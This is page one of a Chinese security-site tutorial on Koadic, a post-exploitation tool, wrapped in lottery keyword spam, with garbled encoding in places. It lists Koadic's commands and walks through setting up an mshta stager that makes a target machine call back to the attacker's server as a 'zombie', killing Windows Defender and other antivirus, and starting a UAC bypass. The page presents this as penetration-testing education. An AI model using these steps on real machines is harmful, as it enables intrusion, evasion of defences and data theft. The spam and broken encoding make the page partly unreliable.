手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

后渗透工具Koadic实战

来源£º本站整理 作者£º佚名 时间£º2019-04-29 TAG£º 我要投稿

渗透测试大致可以分为以下五个阶段£º侦察¡¢扫描¡¢获得访问权限¡¢维护访问/持久性¡¢数据渗漏¡£Koadic是发布于DEFCON上的一个后渗透工具£¬它可用于以上列举的最后两个阶段£¬即权限维持和数据渗漏¡£
利用Windows脚本宿主£¬Koadic提供类似于批处理文件的脚本功能¡£正因如此£¬它可以在包括Windows 10在内的多个Windows环?#25345;?#20351;用¡£
为了躲避杀毒软件的查杀£¬Koadic被设计为在内存?#24615;?#34892;£¬这也显著降低了被查杀的可能性¡£此外£¬它还会通过SSL和TLS来?#29992;?#20445;护通信流量¡£
安装
安装Koadic只需在终端上运行以下命令即可£º
git clone https://github.com/zerosum0x0/koadic.git
导航到安装目录并运行Koadic£º
./koadic
以下列出了Koadic中当前可用的主要命令及其功能¡£
Command Description
edit: shell out to an editor for the current module
listeners: shows info about stagers
sounds: turn sounds off/on: sound(0|1)
help: displays help info for a command
kill: kill a job or all jobs
exit: exits the program
cmdshell: command shell to interact with a zombie
verbose: turn verbosity off/on: verbose (0|1)
creds: shows collected credentials
unset: unsets a variable for the current module
api: turn off/on the rest api
taco: taco time
load: reloads all modules
use: switch to a different module
info: shows the current module options
jobs: shows info about jobs
pyexec: evals some python
domain: shows collected domain information
set: sets a variable for the current module
run: runs the current module
zombies: lists hooked targets
你可以在终端上输入help来查看这些命令£¬如下图所示£º

KOADIC 模块
Koadic有几个内置模块£¬“stager/js/mshta”是首次执行该工具时的默认配置模块¡£你可以通过“info”命令来查看并配置模块¡£
info

以上显示了用户需要配置的所有字段£¬以充分利用stager及目标机器¡£
查看Koadic上可用的所有模块£¬请输入“use”£¬然后双击Tab键¡£

你可以在使用工具期间£¬通过单击Tab键来自动补齐命令或显示给定命令的可用选项¡£
在本文中£¬我将演示如?#38382;?#29992;stager连接到Zombie机器£¬关闭所有防病毒软件£¬执行权限提升£¬收集有用信息并在机器上保持持久性£¬然后安全的渗漏数据¡£通过该简单演示£¬你将对Koadic的功能及其使用方法有一个大致的了解¡£
STAGER 使用
多年来£¬Windows一直在?#27426;?#21152;强其自身的防御能力¡£因此£¬Windows Defender可以直接检测和阻止大多数的stagers¡£出于这个原因£¬我们将使用默认配置的mshta stager£¬因为它被检测和阻止的概率是最低的£¬甚至它可以在某些最新版本的Windows 10上运行¡£
要查看我们应该为stager提供的?#38382;?#20449;息£¬请运行£º
info

从上图可以看出£¬我们必须设置SRVHOST和SRVPORT?#38382;?#25165;能使用satger¡£运行以下命令£¬用你自己的IP替换IP和端口号£º
set SRVHOST 192.168.1.7
set SRVPORT 9999
run
执行时£¬Koadic会在stager log中指定的地址生成一个stager£¬如下所示¡£

复制日志底?#21487;?#25104;的命令并在目标计算机上运行¡£

一个zombie机器被创建£¬目标机器现在已连接到了mshta stager server¡£
立即创建僵尸£¬目标机器现在连接到mshta stager服务器¡£
你可以运行以下命令进行确认£º
zombies

该命令将显示所有的zombie机器£¬我们可以看到这里只显示了个“Zombie 0”£¬这是因为它是迄今为止我们唯一创建的一个zombie¡£
“杀死”防毒软件
下一步是杀死windows defender和所有其他正在运行的防病毒软件£¬以确保我们可以在目标计算机上执行任何我们想要执行的命令¡£你只需简单的运行以下命令即可£º
use implant/manage/killav
info
set zombie 0

要确认模块是否已成功执行£¬请运行£º
zombies 0
权限提升
提权是一个非常重要的阶段£¬一旦成功我们就可以以管理员身份完全的访问计算机£¬并?#19968;?#23558;获取更改计算机关键设置的权限¡£
为此£¬我们可以尝试使用Koadic上的模块来绕过UAC£¨用户帐户控制£©¡£成功率取决于目标机器的Windows版本£¬因为有些可能已经被修补¡£

[1] [2]  下一页

¡¾声明¡¿:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的£¬并不代表本站赞同其观点和对其真实性负责£¬仅适于网络安全技术爱好者学习研究使用£¬学习中请遵循国家相关法律法规¡£如有问题请联系我们£¬联系邮箱[email protected]£¬我们会在最短的时间内进行处理¡£
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载
        ¹ºÂò²ÊƱȨÍþÍøÖ·
        手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中